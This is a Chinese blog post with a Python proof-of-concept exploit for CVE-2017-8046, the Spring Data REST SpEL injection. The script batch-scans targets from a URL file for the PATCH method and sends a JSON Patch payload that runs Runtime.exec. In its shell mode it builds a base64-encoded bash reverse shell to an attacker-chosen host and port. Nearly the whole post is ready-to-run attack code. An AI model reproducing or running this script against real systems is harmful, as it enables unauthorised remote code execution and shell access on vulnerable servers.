网站链接: element-ui dtcms
当前位置: 首页 > 技术博文  > 技术博文

spring CVE-2017-8046 POC

2021/4/15 5:49:53 人评论

为了练习 argparse 库 import requests import json import base64 import argparsedef Option_Check(i, headers, payload):try:r requests.options(i, timeout0.5)if r.status_code 200:r r.textif r.find(patch):print(\033[1;33;40m []存在patch方法: \033[0mi)r2 req…

为了练习 argparse 库

import requests
import json
import base64
import argparse

def Option_Check(i, headers, payload):
    try:
        r = requests.options(i, timeout=0.5)
        if r.status_code == 200:
            r = r.text
            if r.find('patch'):
                print('\033[1;33;40m [+]存在patch方法: \033[0m'+i)
                r2 = requests.patch(i, headers=headers, data=payload, timeout=0.5)
                if r2.status_code == 400:
                    print('\033[1;31;40m [+]攻击成功: \033[0m' + i)
                else:
                    print(r2.status_code)
    except:
        print('error: '+i)

def exp(i, headers, payload):
    r3 = requests.patch(i, headers=headers, data=payload)
    if r3.status_code == 400:
        print('\033[1;31;40m [+] 查看你的vps以确定是否成功\033[0m')
    else:
        print(r3.status_code)

def Byte(ip):
    w = ip
    s = 'bash -i >& /dev/tcp/' + w + ' 0>&1'
    print(s)
    s = bytes(s, 'utf-8')
    s = str(base64.b64encode(s), 'utf-8')
    e = 'bash -c {echo,' + s + '}|{base64,-d}|{bash,-i}'
    payload = bytes(e, 'utf-8')
    bytecode = ','.join(str(i) for i in list(payload))
    return bytecode


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='*********CVE-2017-8046*********')
    group = parser.add_mutually_exclusive_group()
    group.add_argument("-b", "--batch", action="store_true", help='批量检测当前目录url.txt中的url生成success.txt')
    parser.add_argument("-s", "--shell", nargs='+', help='反弹shell格式: -s 127.0.0.1/7777 target_url')
    parser.add_argument("-u", "--url", help='单个url检测格式: -u target_url')
    args = parser.parse_args()

    headers = {'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
               'Connection': 'close', 'Content-Type': 'application/json-patch+json', 'Content-Length': '200'}
    s = [{"op": "replace",
                "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname",
                "value": "vulhub"}]
    payload = json.dumps(s)
    target = ''
    url = '/customers/1'
    url_list = []
    S_list = []

    if args.batch:
        f = open('url.txt', 'r')
        for ip in f.readlines():
            ip = ip.strip()+url
            if ip[:4] != 'http':
                ip = 'http://'+ip
            print(ip)
            Option_Check(ip, headers, payload)
            
        f.close()
    elif args.url:
        i = args.url+url
        if i[:4] != 'http':
            i = 'http://' + i
        Option_Check(i, headers, payload)
    elif args.shell:
        i = args.shell[1]+url
        if i[:4] != 'http':
            i = 'http://' + i
        r_byte = Byte(args.shell[0])
        s = '[{"op": "replace","path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{'+r_byte+'}))/lastname","value": "vulhub"}]'
        payload = json.dumps(s)
        exp(i, headers, payload)

在这里插入图片描述
在这里插入图片描述

相关资讯

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?